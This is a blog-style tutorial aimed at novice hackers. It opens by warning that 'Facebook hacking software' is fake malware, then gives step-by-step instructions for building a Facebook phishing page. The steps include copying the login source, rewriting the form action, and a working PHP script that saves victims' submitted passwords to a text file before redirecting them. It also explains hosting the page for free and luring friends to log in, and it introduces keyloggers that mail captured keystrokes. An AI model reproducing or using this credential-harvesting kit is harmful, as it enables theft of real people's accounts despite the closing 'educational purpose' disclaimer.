Hacking Facebook passwords-Facebook Bruteforcer softwares[for n00b]

 Are you searching for Facebook or gmail Hacking Software?  if your answer is yes,  you come to the right place.

You may read  somewhere else as "use this hacking software to hack facebook accounts". And some hacking blogs has some post like this with procedure:

Download this software

Run the application.

Enter your email id and password

Enter your victim email id.

That's all your friend account is hacked.

Some hacking bloggers also mentioned Bruteforcer for Facebook.  if you enter the email id, it will hack the email. 


First of all , let me ask one question " Do you think facebook is f****ng stupids?"  .  Do you think it is possible to hack any accounts within a minute using these kind of softwares?(Innocence).

The truth is that you are being hacked.  You realized that?

Don't be a n00b, think like a Security Expert.

Then what is Facebook hacking softwares?

There is no Such software that will hack Facebook accounts , if you give email id simply.  They are fake softwares.

What is the Aim of these Kind of Hacking Facebook password softwares?

This kind of fake softwares are created by Hackers to trick n00b hackers.  If the n00b download and run the application, it may launch some malicious programs (spyware,trojans,..).    

Trojans leads to dead of your computer.  But most of hackers won't do this stupid thing.  They use spyware to steal your confidential data instead.

n00b: gadget.controller. you are right, my system is infected by some kind of spyware.

Gadget.controller: that's what i said.

 n00b: but  how hackers hack Facebook account passwords?

Gadget.controller: There are some other ways to hack the Facebook passwords. Let me explain what they are.

Method-1: Phishing webpage

Phishing webpage is traditional way of hacking accounts.  Old is Gold!!  Learn about Phishing now!

Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website. 

Let me explain how to create a facebook phishing .

STEP-1:

Go to facebook and right click on website .  Select "View source" and copy the code to notepad.

STEP-2:

Now search (Press ctrl +f) for keyword "action"  in that code.

You fill find the code like this:

Here, let me explain what "action" means to.  If you have some basic knowledge of web applications, then you already know about that.  'Action' is a HTML attribute that specifies where to send the form-data when a form is submitted.

In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php).  So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.  Note: I've removed ' http://login.facebook.com/' from the value.

Save the file as index.html.

STEP-3:

Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.

Open the notepad and type the following code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this file as "login.php"

STEP-4:

Open the notepad and just save the file as "pswrds.txt" (without any contents).

STEP-5:
To host your phishing page, you may need a webhosting.  You can create a free account in free web hosting providers. Once you have created account in free hosting site, you can host your files and run.  Also, your files can be viewed by visiting a specific URL provided when you create account. For example : 'your_url_name.webhosting_domain.com'.

Now upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. Make sure your fake page is working or not by vising your url. 


Now , You have to lure your friends into login into your phishing page. Once they login into the page, you can see the login credentials being stored in the "pswrds.txt" file.

NOTE:

The above article is for educational purpose only, written for beginners of Ethical hacking or Pentesting to understand the basics so that it will be easy for them to understanding advanced topics.

METHOD-2: Keyloggers

Keylogger is spyware that will capture each key strokes in keyboard.  So , if the victim type the id and passwords, it will be captured and mailed to you.